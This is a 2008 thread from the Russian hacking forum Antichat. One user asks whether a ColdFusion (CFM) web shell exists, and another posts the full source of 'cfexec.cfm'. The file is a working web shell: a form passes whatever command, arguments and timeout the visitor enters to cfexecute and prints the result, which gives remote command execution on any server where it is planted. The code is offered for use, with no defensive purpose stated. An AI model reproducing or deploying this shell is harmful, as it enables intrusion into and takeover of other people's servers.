Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   CFM(cold-fusion) веб-шелл (https://forum.antichat.xyz/showthread.php?t=67473)

$n@ke 16.04.2008 14:40

CFM(cold-fusion) веб-шелл
 
незнал куда постить...

Вобщем такой вопрос, уже неодин раз стлкивалса с проблемой шелла на cfm.

Кто нибуть такой видел? Существует ли он вообще? В привате может?
Важны любые варианты и мнения.

aka PSIH 16.04.2008 14:59

Цитата:

Важны любые варианты и мнения.
попробуй этот:

cfexec.cfm
Код:

<html>
<body>

<cfoutput>
<table>
<form method="POST" action="cfexec.cfm">
<tr>
 <td>Command:</td>
 <td> <input type=text name="cmd" size=50 <cfif isdefined("form.cmd")> value="#form.cmd#" </cfif>> <br></td>
</tr>
<tr>
 <td>Options:</td>
 <td> <input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" </cfif> ><br> </td>
</tr>
<tr>
 <td>Timeout:</td>
 <td><input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5" </cfif> > </td>
</tr>
</table>
<input type=submit value="Exec" >
</FORM>

<cfsavecontent variable="myVar">
<cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
</cfexecute>
</cfsavecontent>
<pre>
#myVar#
</pre>
</cfoutput>
</body>
</html>

Это единственный который я встречал..
хз работает или нет... :rolleyes:


Время: 18:29